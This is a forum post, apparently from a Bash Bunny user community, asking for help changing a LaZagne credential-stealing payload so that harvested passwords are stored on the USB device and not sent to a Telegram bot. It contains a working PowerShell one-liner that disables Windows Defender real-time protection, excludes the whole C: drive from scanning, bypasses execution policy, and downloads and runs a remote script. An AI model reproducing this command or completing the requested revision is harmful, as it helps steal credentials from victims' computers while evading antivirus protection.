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Modifying Lazagne Payload


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greetings and salutations all. Newer to the bunny here but very excited about the possibilities! 
My question for all those of you far more learned in the intricacies of the bunny, is fairly simple. I want to modify the already existing Lazagne payload in the repository. This particualr sctipt has the bunny reachout to a URL to get the lazagne script, this part i want to keep. then the script runs and sends its output to a telegram bot. This is the part I would like to modify, instead i would like for the output to be written onto the internal storage of the bunny itself. 
after some fiddling i came up with this :
powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command 'Invoke-RestMethod #SCRIPT_URL | Out-File \"$env:USERPROFILE\\Desktop\\output.txt\"'"


Now this obviously writes the output to a txt file on the desktop. Can someone please provide me the revised code to instead write it to the bunny itself? Would be super extra awesomeness if an explanation of the altered powershell was provided as well. I look forward to any and all responses, comments, and advice anyone is able and willing to provide on this. Thanks in advance.

~~ThE Bl33d1ng3dg3~~

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